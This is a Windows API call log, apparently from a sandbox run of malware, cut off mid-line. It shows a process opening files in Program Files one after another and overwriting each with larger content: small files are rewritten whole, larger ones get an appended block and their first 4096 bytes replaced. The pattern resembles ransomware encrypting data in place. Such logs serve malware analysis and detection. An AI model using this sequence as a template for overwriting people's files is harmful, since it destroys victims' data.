[0141.090] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xe9 [0141.090] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.090] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.104] ReleaseMutex (hMutex=0x168) returned 1 [0141.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Efate", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Efate", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Efate", lpUsedDefaultChar=0x0) returned 5 [0141.104] ReadFile (in: hFile=0x208, lpBuffer=0x2697108, nNumberOfBytesToRead=0xe9, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697108*, lpNumberOfBytesRead=0x331f2bc*=0xe9, lpOverlapped=0x0) returned 1 [0141.106] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0141.106] WriteFile (in: hFile=0x208, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x671, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x331f2d0*=0x671, lpOverlapped=0x0) returned 1 [0141.106] CloseHandle (hObject=0x208) returned 1 [0141.106] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guam"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0141.107] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.107] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x41 [0141.107] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.107] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.115] ReleaseMutex (hMutex=0x168) returned 1 [0141.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guam", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0141.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guam", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Guam", lpUsedDefaultChar=0x0) returned 4 [0141.115] ReadFile (in: hFile=0x208, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x331f2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.116] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0141.117] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.117] CloseHandle (hObject=0x208) returned 1 [0141.117] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\midway"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0141.148] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.148] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x59 [0141.148] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.148] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.148] ReleaseMutex (hMutex=0x168) returned 1 [0141.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Midway", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Midway", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Midway", lpUsedDefaultChar=0x0) returned 6 [0141.148] ReadFile (in: hFile=0x204, lpBuffer=0x1fbad70, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbad70*, lpNumberOfBytesRead=0x331f2bc*=0x59, lpOverlapped=0x0) returned 1 [0141.150] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0141.150] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0141.150] CloseHandle (hObject=0x204) returned 1 [0141.150] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pohnpei"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0141.152] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.152] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x41 [0141.152] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.152] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.152] ReleaseMutex (hMutex=0x168) returned 1 [0141.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pohnpei", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0141.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pohnpei", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pohnpei", lpUsedDefaultChar=0x0) returned 7 [0141.153] ReadFile (in: hFile=0x204, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x331f2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.154] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0141.154] WriteFile (in: hFile=0x204, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x331f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.154] CloseHandle (hObject=0x204) returned 1 [0141.154] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wallis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.189] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.189] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x41 [0141.189] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0141.189] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.189] ReleaseMutex (hMutex=0x168) returned 1 [0141.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wallis", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wallis", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wallis", lpUsedDefaultChar=0x0) returned 6 [0141.189] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x331f2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.190] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0141.190] WriteFile (in: hFile=0x1cc, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x331f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.191] CloseHandle (hObject=0x1cc) returned 1 [0141.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\hst10"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0148.339] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0148.869] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1b [0148.869] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0148.869] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.869] ReleaseMutex (hMutex=0x168) returned 1 [0148.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HST10", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HST10", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HST10", lpUsedDefaultChar=0x0) returned 5 [0148.869] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x331f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0148.871] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0148.871] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0148.871] CloseHandle (hObject=0x1f0) returned 1 [0148.871] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\zoneinfomappings"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0148.872] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0148.872] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3990 [0148.873] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0148.873] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.873] ReleaseMutex (hMutex=0x168) returned 1 [0148.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZoneInfoMappings", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0148.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZoneInfoMappings", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZoneInfoMappings", lpUsedDefaultChar=0x0) returned 16 [0148.873] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0149.034] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2990 [0149.034] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0149.043] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2990 [0149.043] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0149.044] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0149.044] WriteFile (in: hFile=0x1f0, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0149.044] CloseHandle (hObject=0x1f0) returned 1 [0149.044] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.045] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0149.045] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4932 [0149.045] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0149.045] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.046] ReleaseMutex (hMutex=0x168) returned 1 [0149.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as90.xsl", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0149.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as90.xsl", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="as90.xsl", lpUsedDefaultChar=0x0) returned 8 [0149.046] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0149.063] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3932 [0149.063] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0149.091] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3932 [0149.091] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0149.091] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0149.091] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0149.092] CloseHandle (hObject=0x1f0) returned 1 [0149.092] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.093] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0149.093] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3c18 [0149.093] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0149.093] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.093] ReleaseMutex (hMutex=0x168) returned 1 [0149.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msolui100.rll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msolui100.rll", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msolui100.rll", lpUsedDefaultChar=0x0) returned 13 [0149.093] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0149.175] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2c18 [0149.175] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0149.338] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2c18 [0149.338] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0149.340] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0149.340] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0149.340] CloseHandle (hObject=0x1f0) returned 1 [0149.341] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\crashreporter-override.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\crashreporter-override.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0149.366] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0149.367] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x30f [0149.367] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0149.367] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.367] ReleaseMutex (hMutex=0x168) returned 1 [0149.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="crashreporter-override.ini", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0149.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="crashreporter-override.ini", cchWideChar=26, lpMultiByteStr=0x1f8fcfc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crashreporter-override.ini", lpUsedDefaultChar=0x0) returned 26 [0149.367] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x30f, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x331f2bc*=0x30f, lpOverlapped=0x0) returned 1 [0149.371] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0149.371] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a7bc8*, nNumberOfBytesToWrite=0x897, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesWritten=0x331f2d0*=0x897, lpOverlapped=0x0) returned 1 [0149.371] CloseHandle (hObject=0x1f0) returned 1 [0149.372] CreateFileW (lpFileName="C:\\Program Files 